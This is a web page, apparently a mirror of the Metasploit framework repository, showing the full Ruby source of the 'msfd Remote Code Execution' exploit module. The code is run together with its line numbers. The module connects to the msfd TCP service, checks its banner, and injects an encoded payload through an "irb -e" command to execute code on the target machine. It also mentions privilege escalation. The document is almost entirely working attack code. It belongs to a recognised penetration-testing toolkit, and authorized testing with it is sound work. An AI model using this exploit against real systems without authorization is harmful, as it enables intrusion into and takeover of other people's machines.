Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/multi/misc/msfd_rce_remote.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(update_info(info,12'Name' => 'Metasploit msfd Remote Code Execution',13'Description' => %q{14Metasploit's msfd-service makes it possible to get a msfconsole-like15interface over a TCP socket. If this socket is accessible on a remote16interface, an attacker can execute commands on the victim's machine.1718If msfd is running with higher privileges than the current local user,19this module can also be used for privilege escalation. In that case,20port forwarding on the compromised host can be used.2122Code execution is achieved with the msfconsole command: irb -e 'CODE'.23},24'Author' => 'Robin Stenvi <robin.stenvi[at]gmail.com>',25'License' => BSD_LICENSE,26'Platform' => "ruby",27'Arch' => ARCH_RUBY,28'Payload' =>29{30'Space' => 8192, # Arbitrary limit31'BadChars' => "\x27\x0a",32'DisableNops' => true33},34'Targets' =>35[36[ 'Automatic', { } ]37],38'Privileged' => false,39'DisclosureDate' => '2018-04-11', # Vendor notification40'DefaultTarget' => 0))4142register_options(43[44Opt::RPORT(55554)45])46end4748def check49connect50data = sock.get_once51if data.include?("msf")52disconnect53return Exploit::CheckCode::Appears54end55disconnect56return Exploit::CheckCode::Unknown57end5859def exploit60connect61sock.get_once62sock.put "irb -e '" + payload.encoded + "'\n"63disconnect64end65end666768